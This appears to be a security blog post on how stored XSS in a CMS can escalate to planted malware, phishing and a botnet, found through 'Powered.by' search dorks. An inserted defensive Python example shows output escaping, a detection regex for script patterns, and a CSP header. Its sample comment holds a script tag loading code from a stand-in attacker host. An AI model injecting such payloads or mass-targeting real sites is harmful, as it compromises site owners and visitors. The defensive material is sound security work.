In "OMG - break"-time I wrote one note for You... ;)
Here it is:
(...)
Hello, once upon a time...
Just kidding... not this way. ;]
Ok, so as I wrote a few posts ago, there is a funny thing I have been doing in the last few weeks.
Various crazy attack scenarios showed me various things.
From information disclosure bugs to "not presented in public"
(some of them I posted here, some not, like the XSS in PMA3.4.5 or some SQLi bugs).
When I was searching for the possibility to 'store code in applications',
I was looking for 'what's next' or 'how to use it "for real"' ;).
So... "we found this XSS for logged-in users only". What's next, what's the big deal, what's the difference...? :)
Hmmmm, deface-rence? own3d-rence? what-3lse-rence? ;>
"Why oh why" will this stored code in the <add_Your's_CMS_here;)> application "be" used like this?
Because an attacker who wants Your files/box/etc. will attack You via any possible way.
Any :)
So, please understand it: even a single simple "not critical" hole can get You owned.
Simple way:
1. The attacker creates a 'new account' (let's say there is a bug in the comments, like this one).
2. Now the attacker is logged in, so if the XSS is in this part of the webapp, he can put his code here.
What code?
- shell
- malware
- phishing
3. The added code then becomes part of the next attacks.
Ok. Now the second thing:
if Your CMS is used in internal (company) networks, Your users are vulnerable too:
1. attacks on persons - for example the secretary, reception, marketing offices (in our company), etc.
2. spam vulnerabilities
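The two steps above end with attacker-controlled markup sitting in a comment that every other visitor loads. The following is an added example, not code from the post or from any particular CMS, showing the defensive side of that scenario: comments are stored verbatim, every user-controlled field is HTML-escaped at render time so the markup is displayed as text rather than executed, a cheap pattern check provides a logging/alerting signal, and a Content-Security-Policy limits what a script could do if escaping were ever missed. The functions, the in-memory `db` list and `SAMPLE_COMMENT` are constructed for illustration.

```python
# Added example (not from the post): defusing stored XSS in a CMS comment feature.
# The comment store, render function and sample comment are constructed for illustration.
import html
import re

# A constructed comment of the kind the scenario above describes: text plus injected markup.
SAMPLE_COMMENT = 'Nice post! <script src="http://attacker.example/s.js"></script>'


def store_comment(db: list, author: str, body: str) -> int:
    """Store the comment exactly as submitted and return its index.

    Encoding is deliberately NOT done here: the raw text is kept, and the
    escaping happens at the point where it is rendered into an HTML context.
    """
    db.append({"author": author, "body": body})
    return len(db) - 1


def render_comment(comment: dict) -> str:
    """Render a stored comment as an HTML fragment.

    Every user-controlled field goes through html.escape(quote=True), so '<',
    '>', '&', '"' and "'" are turned into entities and cannot close the element
    or start a new tag. This is what stops the injected <script> from running.
    """
    author = html.escape(comment["author"], quote=True)
    body = html.escape(comment["body"], quote=True)
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


# Patterns that rarely appear in legitimate comment text; used only as a signal.
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:|on\w+\s*=", re.IGNORECASE)


def looks_like_xss_attempt(body: str) -> bool:
    """Detection signal for logging or alerting on a submitted comment.

    This is not a filter and not a substitute for escaping on output; it only
    tells the defender that someone is probing the comment form.
    """
    return bool(SCRIPT_RE.search(body))


def security_headers() -> dict:
    """Response headers that reduce the blast radius of any missed escaping.

    The CSP allows scripts only from the site's own origin, so an injected
    reference to an external script would be blocked by the browser.
    """
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    db = []
    idx = store_comment(db, "guest", SAMPLE_COMMENT)
    print("suspicious:", looks_like_xss_attempt(db[idx]["body"]))
    print(render_comment(db[idx]))
    print(security_headers())
```

Escaping on output rather than on input is the design choice worth noting: the same stored text may later be rendered into HTML, a JSON API or an e-mail, and each of those contexts needs its own encoding.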
So, let's go deeper. :)
"How I owned 27 MLN boxes?" In my imagination only. :)
Reason is simple: I do not break the law.
But there is one thing You should be sure of:
someone somewhere is searching for new vulnerabilities in the latest products.
Webapps, closed-source software, whatever.
Now, a simple XSS for a "normal user" can be used for this:
You found a bug in some latest $cms?
Type this version into www.google.com. Got the idea?
So type this version (the one where You found the vuln) @Google + "Powered.by"... ;]
Got it now? ;)
The answer You will see in millions.
In short: if Your webapp/CMS can be exploited by XSS, then there is no
problem building a botnet (site:powered.by... and writing python code to store the XSS and 'search for the next target' should tell You the rest).
And that's the whole story. ;)
For security testing, ask here.
What do You think...?